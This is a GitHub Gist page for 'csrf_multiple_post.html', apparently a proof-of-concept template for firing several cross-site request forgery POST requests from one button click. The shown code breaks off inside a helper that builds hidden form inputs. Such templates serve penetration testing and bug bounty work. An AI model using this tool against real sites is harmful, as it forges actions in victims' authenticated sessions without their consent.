Skip to content

Instantly share code, notes, and snippets.

View electro0nes's full-sized avatar
💭
Security

Moein Erfanian electro0nes

💭
Security
View GitHub Profile
@electro0nes
electro0nes / csrf_multiple_post.html
Created July 6, 2025 23:10 — forked from MEY-D/csrf_multiple_post.html
CSRF Multiple POST requests
<!DOCTYPE html>
<html>
<body>
<button onclick="run()">Click</button>
<script>
function addInput(form, paramString) {
paramString.split("&").forEach(pair => {
const [name, value] = pair.split("=");
form.appendChild(Object.assign(document.createElement("input"), {